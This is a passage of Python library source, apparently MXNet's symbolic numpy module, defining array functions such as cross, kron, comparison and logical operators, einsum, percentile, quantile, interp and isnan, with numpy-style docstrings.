vectors are defined by the last axis of `a` and `b` by default, and these axes can have dimensions 2 or 3. Where the dimension of either `a` or `b` is 2, the third component of the input vector is assumed to be zero and the cross product calculated accordingly. In cases where both input vectors have dimension 2, the z-component of the cross product is returned. Parameters ---------- a : _Symbol Components of the first vector(s). b : _Symbol Components of the second vector(s). axisa : int, optional Axis of `a` that defines the vector(s). By default, the last axis. axisb : int, optional Axis of `b` that defines the vector(s). By default, the last axis. axisc : int, optional Axis of `c` containing the cross product vector(s). Ignored if both input vectors have dimension 2, as the return is scalar. By default, the last axis. axis : int, optional If defined, the axis of `a`, `b` and `c` that defines the vector(s) and cross product(s). Overrides `axisa`, `axisb` and `axisc`. Returns ------- c : _Symbol Vector cross product(s). Raises ------ ValueError When the dimension of the vector(s) in `a` and/or `b` does not equal 2 or 3. Notes ----- Supports full broadcasting of the inputs. """ if axis is not None: axisa, axisb, axisc = (axis,) * 3 return _npi.cross(a, b, axisa, axisb, axisc) @set_module('mxnet.symbol.numpy') def kron(a, b): r""" kron(a, b) Kronecker product of two arrays. Computes the Kronecker product, a composite array made of blocks of the second array scaled by the first. Parameters ---------- a, b : ndarray Returns ------- out : ndarray See Also -------- outer : The outer product Notes ----- The function assumes that the number of dimensions of `a` and `b` are the same, if necessary prepending the smallest with ones. If `a.shape = (r0,r1,..,rN)` and `b.shape = (s0,s1,...,sN)`, the Kronecker product has shape `(r0*s0, r1*s1, ..., rN*SN)`. The elements are products of elements from `a` and `b`, organized explicitly by:: kron(a,b)[k0,k1,...,kN] = a[i0,i1,...,iN] * b[j0,j1,...,jN] where:: kt = it * st + jt, t = 0,...,N In the common 2-D case (N=1), the block structure can be visualized:: [[ a[0,0]*b, a[0,1]*b, ... , a[0,-1]*b ], [ ... ... ], [ a[-1,0]*b, a[-1,1]*b, ... , a[-1,-1]*b ]] Examples -------- >>> np.kron([1,10,100], [5,6,7]) array([ 5, 6, 7, 50, 60, 70, 500, 600, 700]) >>> np.kron([5,6,7], [1,10,100]) array([ 5, 50, 500, 6, 60, 600, 7, 70, 700]) """ return _npi.kron(a, b) @set_module('mxnet.symbol.numpy') def equal(x1, x2, out=None): """ Return (x1 == x2) element-wise. Parameters ---------- x1, x2 : _Symbol or scalars Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to a common shape (which becomes the shape of the output). out : Dummy parameter, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. Returns ------- out : _Symbol or scalar Output array of type bool, element-wise comparison of `x1` and `x2`. This is a scalar if both `x1` and `x2` are scalars. See Also -------- not_equal, greater_equal, less_equal, greater, less Examples -------- >>> np.equal(np.ones(2, 1)), np.zeros(1, 3)) array([[False, False, False], [False, False, False]]) >>> np.equal(1, np.ones(1)) array([ True]) """ return _ufunc_helper(x1, x2, _npi.equal, _np.equal, _npi.equal_scalar, None, out) @set_module('mxnet.symbol.numpy') def not_equal(x1, x2, out=None): """ Return (x1 != x2) element-wise. Parameters ---------- x1, x2 : _Symbol or scalars Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to a common shape (which becomes the shape of the output). out : Dummy parameter, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. Returns ------- out : _Symbol or scalar Output array of type bool, element-wise comparison of `x1` and `x2`. This is a scalar if both `x1` and `x2` are scalars. See Also -------- equal, greater, greater_equal, less, less_equal Examples -------- >>> np.not_equal(np.ones(2, 1)), np.zeros(1, 3)) array([[ True, True, True], [ True, True, True]]) >>> np.not_equal(1, np.ones(1)) array([False]) """ return _ufunc_helper(x1, x2, _npi.not_equal, _np.not_equal, _npi.not_equal_scalar, None, out) @set_module('mxnet.symbol.numpy') def greater(x1, x2, out=None): """ Return the truth value of (x1 > x2) element-wise. Parameters ---------- x1, x2 : _Symbol or scalars Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to a common shape (which becomes the shape of the output). out : Dummy parameter, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. Returns ------- out : _Symbol or scalar Output array of type bool, element-wise comparison of `x1` and `x2`. This is a scalar if both `x1` and `x2` are scalars. See Also -------- equal, greater, greater_equal, less, less_equal Examples -------- >>> np.greater(np.ones(2, 1)), np.zeros(1, 3)) array([[ True, True, True], [ True, True, True]]) >>> np.greater(1, np.ones(1)) array([False]) """ return _ufunc_helper(x1, x2, _npi.greater, _np.greater, _npi.greater_scalar, _npi.less_scalar, out) @set_module('mxnet.symbol.numpy') def less(x1, x2, out=None): """ Return the truth value of (x1 < x2) element-wise. Parameters ---------- x1, x2 : _Symbol or scalars Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to a common shape (which becomes the shape of the output). out : Dummy parameter, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. Returns ------- out : _Symbol or scalar Output array of type bool, element-wise comparison of `x1` and `x2`. This is a scalar if both `x1` and `x2` are scalars. See Also -------- equal, greater, greater_equal, less, less_equal Examples -------- >>> np.less(np.ones(2, 1)), np.zeros(1, 3)) array([[ True, True, True], [ True, True, True]]) >>> np.less(1, np.ones(1)) array([False]) """ return _ufunc_helper(x1, x2, _npi.less, _np.less, _npi.less_scalar, _npi.greater_scalar, out) @set_module('mxnet.symbol.numpy') def greater_equal(x1, x2, out=None): """ Return the truth value of (x1 >= x2) element-wise. Parameters ---------- x1, x2 : _Symbol or scalars Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to a common shape (which becomes the shape of the output). out : Dummy parameter, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. Returns ------- out : _Symbol or scalar Output array of type bool, element-wise comparison of `x1` and `x2`. This is a scalar if both `x1` and `x2` are scalars. See Also -------- equal, greater, greater_equal, less, less_equal Examples -------- >>> np.greater_equal(np.ones(2, 1)), np.zeros(1, 3)) array([[ True, True, True], [ True, True, True]]) >>> np.greater_equal(1, np.ones(1)) array([True]) """ return _ufunc_helper(x1, x2, _npi.greater_equal, _np.greater_equal, _npi.greater_equal_scalar, _npi.less_equal_scalar, out) @set_module('mxnet.symbol.numpy') def less_equal(x1, x2, out=None): """ Return the truth value of (x1 <= x2) element-wise. Parameters ---------- x1, x2 : _Symbol or scalars Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to a common shape (which becomes the shape of the output). out : Dummy parameter, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. Returns ------- out : _Symbol or scalar Output array of type bool, element-wise comparison of `x1` and `x2`. This is a scalar if both `x1` and `x2` are scalars. See Also -------- equal, greater, greater_equal, less, less_equal Examples -------- >>> np.less_equal(np.ones(2, 1)), np.zeros(1, 3)) array([[False, False, False], [False, False, False]]) >>> np.less_equal(1, np.ones(1)) array([True]) """ return _ufunc_helper(x1, x2, _npi.less_equal, _np.less_equal, _npi.less_equal_scalar, _npi.greater_equal_scalar, out) @set_module('mxnet.symbol.numpy') def roll(a, shift, axis=None): """ Roll array elements along a given axis. Elements that roll beyond the last position are re-introduced at the first. Parameters ---------- a : _Symbol Input array. shift : int or tuple of ints The number of places by which elements are shifted. If a tuple, then `axis` must be a tuple of the same size, and each of the given axes is shifted by the corresponding number. If an int while `axis` is a tuple of ints, then the same value is used for all given axes. axis : int or tuple of ints, optional Axis or axes along which elements are shifted. By default, the array is flattened before shifting, after which the original shape is restored. Returns ------- res : _Symbol Output array, with the same shape as `a`. Notes ----- Supports rolling over multiple dimensions simultaneously. """ return _npi.roll(a, shift, axis=axis) @wrap_np_binary_func def logical_and(x1, x2, out=None): r""" Compute the truth value of x1 AND x2 element-wise. Parameters ---------- x1, x2 : array_like Logical AND is applied to the elements of `x1` and `x2`. If ``x1.shape != x2.shape``, they must be broadcastable to a common shape (which becomes the shape of the output). out : ndarray, None, or tuple of ndarray and None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. A tuple (possible only as a keyword argument) must have length equal to the number of outputs. Returns ------- y : ndarray or bool Boolean result of the logical AND operation applied to the elements of `x1` and `x2`; the shape is determined by broadcasting. This is a scalar if both `x1` and `x2` are scalars. See Also -------- logical_or, logical_not, logical_xor, bitwise_or Examples -------- >>> np.logical_and(True, False) False >>> np.logical_and(np.array([True, True], dtype='bool'), np.array([False, True], dtype='bool')) array([False, True]) """ return _ufunc_helper(x1, x2, _npi.logical_and, _np.logical_and, _npi.logical_and_scalar, None, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def logical_or(x1, x2, out=None): r""" Compute the truth value of x1 OR x2 element-wise. Parameters ---------- x1, x2 : array_like Logical OR is applied to the elements of `x1` and `x2`. If ``x1.shape != x2.shape``, they must be broadcastable to a common shape (which becomes the shape of the output). out : ndarray, None, or tuple of ndarray and None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. A tuple (possible only as a keyword argument) must have length equal to the number of outputs. Returns ------- y : ndarray or bool Boolean result of the logical OR operation applied to the elements of `x1` and `x2`; the shape is determined by broadcasting. This is a scalar if both `x1` and `x2` are scalars. See Also -------- logical_and, logical_not, logical_xor, bitwise_or Examples -------- >>> np.logical_or(True, False) True >>> np.logical_or(np.array([True, True], dtype='bool'), np.array([False, True], dtype='bool')) array([True, True]) """ return _ufunc_helper(x1, x2, _npi.logical_or, _np.logical_or, _npi.logical_or_scalar, None, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def logical_xor(x1, x2, out=None): r""" Compute the truth value of x1 XOR x2 element-wise. Parameters ---------- x1, x2 : array_like Logical XOR is applied to the elements of `x1` and `x2`. If ``x1.shape != x2.shape``, they must be broadcastable to a common shape (which becomes the shape of the output). out : ndarray, None, or tuple of ndarray and None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. A tuple (possible only as a keyword argument) must have length equal to the number of outputs. Returns ------- y : ndarray or bool Boolean result of the logical XOR operation applied to the elements of `x1` and `x2`; the shape is determined by broadcasting. This is a scalar if both `x1` and `x2` are scalars. See Also -------- logical_and, logical_not, logical_or, bitwise_or Examples -------- >>> np.logical_xor(True, False) True >>> np.logical_xor(np.array([True, True], dtype='bool'), np.array([False, True], dtype='bool')) array([ True, False]) """ return _ufunc_helper(x1, x2, _npi.logical_xor, _np.logical_xor, _npi.logical_xor_scalar, None, out) @set_module('mxnet.symbol.numpy') def rot90(m, k=1, axes=(0, 1)): """ Rotate an array by 90 degrees in the plane specified by axes. Rotation direction is from the first towards the second axis. Parameters ---------- m : _Symbol Array of two or more dimensions. k : integer Number of times the array is rotated by 90 degrees. axes: (2,) array_like The array is rotated in the plane defined by the axes. Axes must be different. Returns ------- y : _Symbol A rotated view of `m`. ----- rot90(m, k=1, axes=(1,0)) is the reverse of rot90(m, k=1, axes=(0,1)) rot90(m, k=1, axes=(1,0)) is equivalent to rot90(m, k=-1, axes=(0,1)) Examples -------- >>> m = np.array([[1,2],[3,4]], 'int') >>> m array([[1, 2], [3, 4]], dtype=int64) >>> np.rot90(m) array([[2, 4], [1, 3]], dtype=int64) >>> np.rot90(m, 2) array([[4, 3], [2, 1]], dtype=int64) >>> m = np.arange(8).reshape((2,2,2)) >>> np.rot90(m, 1, (1,2)) array([[[1., 3.], [0., 2.]], [[5., 7.], [4., 6.]]]) """ return _npi.rot90(m, k=k, axes=axes) @set_module('mxnet.symbol.numpy') def einsum(*operands, **kwargs): r""" einsum(subscripts, *operands, out=None, optimize=False) Evaluates the Einstein summation convention on the operands. Using the Einstein summation convention, many common multi-dimensional, linear algebraic array operations can be represented in a simple fashion. In *implicit* mode `einsum` computes these values. In *explicit* mode, `einsum` provides further flexibility to compute other array operations that might not be considered classical Einstein summation operations, by disabling, or forcing summation over specified subscript labels. See the notes and examples for clarification. Parameters ---------- subscripts : str Specifies the subscripts for summation as comma separated list of subscript labels. An implicit (classical Einstein summation) calculation is performed unless the explicit indicator '->' is included as well as subscript labels of the precise output form. operands : list of _Symbol These are the arrays for the operation. out : _Symbol, optional If provided, the calculation is done into this array. optimize : {False, True}, optional Controls if intermediate optimization should occur. No optimization will occur if False. Defaults to False. Returns ------- output : _Symbol The calculation based on the Einstein summation convention. Notes ----- The Einstein summation convention can be used to compute many multi-dimensional, linear algebraic array operations. `einsum` provides a succinct way of representing these. A non-exhaustive list of these operations, which can be computed by `einsum`, is shown below along with examples: * Trace of an array, :py:func:`np.trace`. * Return a diagonal, :py:func:`np.diag`. * Array axis summations, :py:func:`np.sum`. * Transpositions and permutations, :py:func:`np.transpose`. * Matrix multiplication and dot product, :py:func:`np.matmul` :py:func:`np.dot`. * Vector inner and outer products, :py:func:`np.inner` :py:func:`np.outer`. * Broadcasting, element-wise and scalar multiplication, :py:func:`np.multiply`. * Tensor contractions, :py:func:`np.tensordot`. The subscripts string is a comma-separated list of subscript labels, where each label refers to a dimension of the corresponding operand. Whenever a label is repeated it is summed, so ``np.einsum('i,i', a, b)`` is equivalent to :py:func:`np.inner(a,b) <np.inner>`. If a label appears only once, it is not summed, so ``np.einsum('i', a)`` produces a view of ``a`` with no changes. A further example ``np.einsum('ij,jk', a, b)`` describes traditional matrix multiplication and is equivalent to :py:func:`np.matmul(a,b) <np.matmul>`. Repeated subscript labels in one operand take the diagonal. For example, ``np.einsum('ii', a)`` is equivalent to :py:func:`np.trace(a) <np.trace>`. In *implicit mode*, the chosen subscripts are important since the axes of the output are reordered alphabetically. This means that ``np.einsum('ij', a)`` doesn't affect a 2D array, while ``np.einsum('ji', a)`` takes its transpose. Additionally, ``np.einsum('ij,jk', a, b)`` returns a matrix multiplication, while, ``np.einsum('ij,jh', a, b)`` returns the transpose of the multiplication since subscript 'h' precedes subscript 'i'. In *explicit mode* the output can be directly controlled by specifying output subscript labels. This requires the identifier '->' as well as the list of output subscript labels. This feature increases the flexibility of the function since summing can be disabled or forced when required. The call ``np.einsum('i->', a)`` is like :py:func:`np.sum(a, axis=-1) <np.sum>`, and ``np.einsum('ii->i', a)`` is like :py:func:`np.diag(a) <np.diag>`. The difference is that `einsum` does not allow broadcasting by default. Additionally ``np.einsum('ij,jh->ih', a, b)`` directly specifies the order of the output subscript labels and therefore returns matrix multiplication, unlike the example above in implicit mode. To enable and control broadcasting, use an ellipsis. Default NumPy-style broadcasting is done by adding an ellipsis to the left of each term, like ``np.einsum('...ii->...i', a)``. To take the trace along the first and last axes, you can do ``np.einsum('i...i', a)``, or to do a matrix-matrix product with the left-most indices instead of rightmost, one can do ``np.einsum('ij...,jk...->ik...', a, b)``. When there is only one operand, no axes are summed, and no output parameter is provided, a view into the operand is returned instead of a new array. Thus, taking the diagonal as ``np.einsum('ii->i', a)`` produces a view. The ``optimize`` argument which will optimize the contraction order of an einsum expression. For a contraction with three or more operands this can greatly increase the computational efficiency at the cost of a larger memory footprint during computation. Typically a 'greedy' algorithm is applied which empirical tests have shown returns the optimal path in the majority of cases. 'optimal' is not supported for now. This function differs from the original `numpy.einsum <https://docs.scipy.org/doc/numpy/reference/generated/numpy.einsum.html>`_ in the following way(s): - Does not support 'optimal' strategy - Does not support the alternative subscript like `einsum(op0, sublist0, op1, sublist1, ..., [sublistout])` - Does not produce view in any cases """ # Grab non-einsum kwargs; do not optimize by default. optimize_arg = kwargs.pop('optimize', False) out = kwargs.pop('out', None) subscripts = operands[0] operands = operands[1:] return _npi.einsum(*operands, subscripts=subscripts, out=out, optimize=int(optimize_arg)) @set_module('mxnet.symbol.numpy') def percentile(a, q, axis=None, out=None, overwrite_input=None, interpolation='linear', keepdims=False): # pylint: disable=too-many-arguments """ Compute the q-th percentile of the data along the specified axis. Returns the q-th percentile(s) of the array elements. Parameters ---------- a : _Symbol Input array q : _Symbol Percentile or sequence of percentiles to compute. axis : {int, tuple of int, None}, optional Axis or axes along which the percentiles are computed. The default is to compute the percentile(s) along a flattened version of the array. out : ndarray, optional Alternative output array in which to place the result. It must have the same shape and buffer length as the expected output, but the type (of the output) will be cast if necessary. overwrite_input : bool, optional (Not supported yet) If True, then allow the input array a to be modified by intermediate calculations, to save memory. In this case, the contents of the input a after this function completes is undefined. interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'} This optional parameter specifies the interpolation method to use when the desired percentile lies between two data points i < j: 'linear': i + (j - i) * fraction, where fraction is the fractional part of the index surrounded by i and j. 'lower': i. 'higher': j. 'nearest': i or j, whichever is nearest. 'midpoint': (i + j) / 2. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the original array a. Returns ------- percentile : _Symbol Output array. """ if overwrite_input is not None: raise NotImplementedError('overwrite_input is not supported yet') if isinstance(q, numeric_types): return _npi.percentile(a, axis=axis, interpolation=interpolation, keepdims=keepdims, q_scalar=q, out=out) return _npi.percentile(a, q, axis=axis, interpolation=interpolation, keepdims=keepdims, q_scalar=None, out=out) @set_module('mxnet.symbol.numpy') def median(a, axis=None, out=None, overwrite_input=None, keepdims=False): r""" Compute the median along the specified axis. Returns the median of the array elements. Parameters ---------- a : _Symbol Input array or object that can be converted to an array. axis : {int, sequence of int, None}, optional Axis or axes along which the medians are computed. The default is to compute the median along a flattened version of the array. A sequence of axes is supported since version 1.9.0. out : _Symbol, optional Alternative output array in which to place the result. It must have the same shape and buffer length as the expected output, but the type (of the output) will be cast if necessary. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the original `arr`. Returns ------- median : _Symbol A new array holding the result. If the input contains integers or floats smaller than ``float32``, then the output data-type is ``np.float32``. Otherwise, the data-type of the output is the same as that of the input. If `out` is specified, that array is returned instead. See Also -------- mean, percentile """ return quantile(a=a, q=0.5, axis=axis, out=out, overwrite_input=overwrite_input, interpolation='midpoint', keepdims=keepdims) @set_module('mxnet.symbol.numpy') def quantile(a, q, axis=None, out=None, overwrite_input=None, interpolation='linear', keepdims=False): # pylint: disable=too-many-arguments """ Compute the q-th quantile of the data along the specified axis. New in version 1.15.0. Parameters ---------- a : _Symbol Input array or object that can be converted to an array. q : _Symbol Quantile or sequence of quantiles to compute, which must be between 0 and 1 inclusive. axis : {int, tuple of int, None}, optional Axis or axes along which the quantiles are computed. The default is to compute the quantile(s) along a flattened version of the array. out : ndarray, optional Alternative output array in which to place the result. It must have the same shape and buffer length as the expected output, but the type (of the output) will be cast if necessary. interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'} This optional parameter specifies the interpolation method to use when the desired quantile lies between two data points i < j: linear: i + (j - i) * fraction, where fraction is the fractional part of the index surrounded by i and j. lower: i. higher: j. nearest: i or j, whichever is nearest. midpoint: (i + j) / 2. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the original array a. Returns ------- quantile : _Symbol If q is a single quantile and axis=None, then the result is a scalar. If multiple quantiles are given, first axis of the result corresponds to the quantiles. The other axes are the axes that remain after the reduction of a. If out is specified, that array is returned instead. See also -------- mean Notes ----- Given a vector V of length N, the q-th quantile of V is the value q of the way from the minimum to the maximum in a sorted copy of V. The values and distances of the two nearest neighbors as well as the interpolation parameter will determine the quantile if the normalized ranking does not match the location of q exactly. This function is the same as the median if q=0.5, the same as the minimum if q=0.0 and the same as the maximum if q=1.0. This function differs from the original `numpy.quantile <https://numpy.org/devdocs/reference/generated/numpy.quantile.html>`_ in the following aspects: - q must be _Symbol type even if it is a scalar - do not support overwrite_input """ if overwrite_input is not None: raise NotImplementedError('overwrite_input is not supported yet') if isinstance(q, numeric_types): return _npi.percentile(a, axis=axis, interpolation=interpolation, keepdims=keepdims, q_scalar=q * 100, out=out) return _npi.percentile(a, q * 100, axis=axis, interpolation=interpolation, keepdims=keepdims, q_scalar=None, out=out) @set_module('mxnet.symbol.numpy') def shares_memory(a, b, max_work=None): """ Determine if two arrays share memory Parameters ---------- a, b : _Symbol Input arrays Returns ------- out : _Symbol """ return _npi.share_memory(a, b) @set_module('mxnet.symbol.numpy') def may_share_memory(a, b, max_work=None): """ Determine if two arrays might share memory A return of True does not necessarily mean that the two arrays share any element. It just means that they *might*. Only the memory bounds of a and b are checked by default. Parameters ---------- a, b : _Symbol Input arrays Returns ------- out : _Symbol """ return _npi.share_memory(a, b) @set_module('mxnet.symbol.numpy') def diff(a, n=1, axis=-1, prepend=None, append=None): # pylint: disable=redefined-outer-name r""" Calculate the n-th discrete difference along the given axis. Parameters ---------- a : _Symbol Input array n : int, optional The number of times values are differenced. If zero, the input is returned as-is. axis : int, optional The axis along which the difference is taken, default is the last axis. prepend, append : _Symbol, optional Not supported yet Returns ------- diff : _Symbol The n-th differences. The shape of the output is the same as a except along axis where the dimension is smaller by n. The type of the output is the same as the type of the difference between any two elements of a. This is the same as the type of a in most cases. Examples -------- >>> x = np.array([1, 2, 4, 7, 0]) >>> np.diff(x) array([ 1, 2, 3, -7]) >>> np.diff(x, n=2) array([ 1, 1, -10]) >>> x = np.array([[1, 3, 6, 10], [0, 5, 6, 8]]) >>> np.diff(x) array([[2, 3, 4], [5, 1, 2]]) >>> np.diff(x, axis=0) array([[-1, 2, 0, -2]]) Notes ----- Optional inputs `prepend` and `append` are not supported yet """ if (prepend or append): raise NotImplementedError('prepend and append options are not supported yet') return _npi.diff(a, n=n, axis=axis) @set_module('mxnet.symbol.numpy') def ediff1d(ary, to_end=None, to_begin=None): """ The differences between consecutive elements of an array. Parameters ---------- ary : _Symbol If necessary, will be flattened before the differences are taken. to_end : _Symbol or scalar, optional Number(s) to append at the end of the returned differences. to_begin : _Symbol or scalar, optional Number(s) to prepend at the beginning of the returned differences. Returns ------- ediff1d : _Symbol The differences. Loosely, this is ``ary.flat[1:] - ary.flat[:-1]``. """ input_type = (isinstance(to_begin, _Symbol), isinstance(to_end, _Symbol)) # case 1: when both `to_begin` and `to_end` are arrays if input_type == (True, True): return _npi.ediff1d(ary, to_begin, to_end, to_begin_arr_given=True, to_end_arr_given=True, to_begin_scalar=None, to_end_scalar=None) # case 2: only `to_end` is array but `to_begin` is scalar/None elif input_type == (False, True): return _npi.ediff1d(ary, to_end, to_begin_arr_given=False, to_end_arr_given=True, to_begin_scalar=to_begin, to_end_scalar=None) # case 3: only `to_begin` is array but `to_end` is scalar/None elif input_type == (True, False): return _npi.ediff1d(ary, to_begin, to_begin_arr_given=True, to_end_arr_given=False, to_begin_scalar=None, to_end_scalar=to_end) # case 4: both `to_begin` and `to_end` are scalar/None else: return _npi.ediff1d(ary, to_begin_arr_given=False, to_end_arr_given=False, to_begin_scalar=to_begin, to_end_scalar=to_end) @set_module('mxnet.symbol.numpy') def interp(x, xp, fp, left=None, right=None, period=None): # pylint: disable=too-many-arguments """ One-dimensional linear interpolation. Returns the one-dimensional piecewise linear interpolant to a function with given values at discrete data-points. Parameters ---------- x : _Symbol The x-coordinates of the interpolated values. xp : _Symbol The x-coordinates of the data points, must be increasing if argument `period` is not specified. Otherwise, `xp` is internally sorted after normalizing the periodic boundaries with ``xp = xp % period``. fp : _Symbol The y-coordinates of the data points, same length as `xp`. left : optional float corresponding to fp Value to return for `x < xp[0]`, default is `fp[0]`. right : optional float corresponding to fp Value to return for `x > xp[-1]`, default is `fp[-1]`. period : None or float, optional A period for the x-coordinates. This parameter allows the proper interpolation of angular x-coordinates. Parameters `left` and `right` are ignored if `period` is specified. .. versionadded:: 1.10.0 Returns ------- y : _Symbol The interpolated values, same shape as `x`. Raises ------ ValueError If `xp` and `fp` have different length If `xp` or `fp` are not 1-D sequences If `period == 0` Notes ----- Does not check that the x-coordinate sequence `xp` is increasing. If `xp` is not increasing, the results are nonsense. A simple check for increasing is:: np.all(np.diff(xp) > 0) """ if isinstance(x, numeric_types): return _npi.interp(xp.astype(float), fp.astype(float), left=left, right=right, period=period, x_scalar=x, x_is_scalar=True) return _npi.interp(xp.astype(float), fp.astype(float), x.astype(float), left=left, right=right, period=period, x_scalar=0.0, x_is_scalar=False) @set_module('mxnet.symbol.numpy') def resize(a, new_shape): """ Return a new array with the specified shape. If the new array is larger than the original array, then the new array is filled with repeated copies of `a`. Note that this behavior is different from a.resize(new_shape) which fills with zeros instead of repeated copies of `a`. Parameters ---------- a : _Symbol Array to be resized. new_shape : int or tuple of int Shape of resized array. Returns ------- reshaped_array : _Symbol The new array is formed from the data in the old array, repeated if necessary to fill out the required number of elements. The data are repeated in the order that they are stored in memory. See Also -------- ndarray.resize : resize an array in-place. Notes ----- Warning: This functionality does **not** consider axes separately, i.e. it does not apply interpolation/extrapolation. It fills the return array with the required number of elements, taken from `a` as they are laid out in memory, disregarding strides and axes. (This is in case the new shape is smaller. For larger, see above.) This functionality is therefore not suitable to resize images, or data where each axis represents a separate and distinct entity. Examples -------- >>> a = np.array([[0, 1], [2, 3]]) >>> np.resize(a, (2, 3)) array([[0., 1., 2.], [3., 0., 1.]]) >>> np.resize(a, (1, 4)) array([[0., 1., 2., 3.]]) >>> np.resize(a,(2, 4)) array([[0., 1., 2., 3.], [0., 1., 2., 3.]]) """ return _npi.resize_fallback(a, new_shape=new_shape) # pylint: disable=redefined-outer-name @set_module('mxnet.symbol.numpy') def nan_to_num(x, copy=True, nan=0.0, posinf=None, neginf=None, **kwargs): """ Replace NaN with zero and infinity with large finite numbers (default behaviour) or with the numbers defined by the user using the `nan`, `posinf` and/or `neginf` keywords. If `x` is inexact, NaN is replaced by zero or by the user defined value in `nan` keyword, infinity is replaced by the largest finite floating point values representable by ``x.dtype`` or by the user defined value in `posinf` keyword and -infinity is replaced by the most negative finite floating point values representable by ``x.dtype`` or by the user defined value in `neginf` keyword. For complex dtypes, the above is applied to each of the real and imaginary components of `x` separately. If `x` is not inexact, then no replacements are made. Parameters ---------- x : _Symbol Input data. copy : bool, optional Whether to create a copy of `x` (True) or to replace values in-place (False). The in-place operation only occurs if casting to an array does not require a copy. Default is True. nan : int, float, optional Value to be used to fill NaN values. If no value is passed then NaN values will be replaced with 0.0. posinf : int, float, optional Value to be used to fill positive infinity values. If no value is passed then positive infinity values will be replaced with a very large number. neginf : int, float, optional Value to be used to fill negative infinity values. If no value is passed then negative infinity values will be replaced with a very small (or negative) number. .. versionadded:: 1.13 Returns ------- out : _Symbol `x`, with the non-finite values replaced. If `copy` is False, this may be `x` itself. Notes ----- NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754). This means that Not a Number is not equivalent to infinity. """ if isinstance(x, numeric_types): return _np.nan_to_num(x, copy, nan, posinf, neginf) elif isinstance(x, _Symbol): if not copy: return _npi.nan_to_num(x, copy=copy, nan=nan, posinf=posinf, neginf=neginf, out=x) return _npi.nan_to_num(x, copy=copy, nan=nan, posinf=posinf, neginf=neginf, out=None) else: raise TypeError('type {} not supported'.format(str(type(x)))) @set_module('mxnet.symbol.numpy') def squeeze(x, axis=None): """ Remove single-dimensional entries from the shape of an array. Parameters ---------- a : array_like Input data. axis : None or int or tuple of ints, optional .. versionadded:: 1.7.0 Selects a subset of the single-dimensional entries in the shape. If an axis is selected with shape entry greater than one, an error is raised. Returns ------- squeezed : ndarray The input array, but with all or a subset of the dimensions of length 1 removed. This is always `a` itself or a view into `a`. Raises ------ ValueError If `axis` is not `None`, and an axis being squeezed is not of length 1 See Also -------- expand_dims : The inverse operation, adding singleton dimensions reshape : Insert, remove, and combine dimensions, and resize existing ones Examples -------- >>> x = np.array([[[0], [1], [2]]]) >>> x.shape (1, 3, 1) >>> np.squeeze(x).shape (3,) >>> np.squeeze(x, axis=0).shape (3, 1) >>> np.squeeze(x, axis=1).shape Traceback (most recent call last): ... ValueError: cannot select an axis to squeeze out which has size not equal to one >>> np.squeeze(x, axis=2).shape (1, 3) """ return _npi.squeeze(x, axis=axis) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def isnan(x, out=None, **kwargs): """ Test element-wise for NaN and return result as a boolean array. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None, optional A location into which the result is stored. If provided, it must have the same shape and dtype as input ndarray. If not provided or `None`, a freshly-allocated array is returned. Returns ------- y : _Symbol or bool True where x is NaN, false otherwise. This is a scalar if x is a scalar. Notes ----- NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754). This means that Not a Number is not equivalent to infinity. This function differs from the original `numpy.isnan <https://docs.scipy.org/doc/numpy/reference/generated/numpy.isnan.html>`_ in the following aspects: - Does not support complex number for now - Input type does not support Python native iterables(list, tuple, ...). - ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output. - ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output. - ``out`` param does not support scalar input case. """ return _unary_func_helper(x, _npi.isnan, _np.isnan, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def isinf(x, out=None, **kwargs): """ Test element-wise for positive or negative infinity. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None, optional A location into which the result is stored. If provided, it must have the same shape and dtype as input ndarray. If not provided or `None`, a freshly-allocated array is returned. Returns ------- y : _Symbol or bool True where x is positive or negative infinity, false otherwise. This is a scalar if x is a scalar. Notes ----- NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754). This function differs from the original `numpy.isinf <https://docs.scipy.org/doc/numpy/reference/generated/numpy.isnan.html>`_ in the following aspects: - Does not support complex number for now - Input type does not support Python native iterables(list, tuple, ...). - ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output. - ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output. - ``out`` param does not support scalar input case. """ return _unary_func_helper(x, _npi.isinf, _np.isinf, out=out, **kwargs) 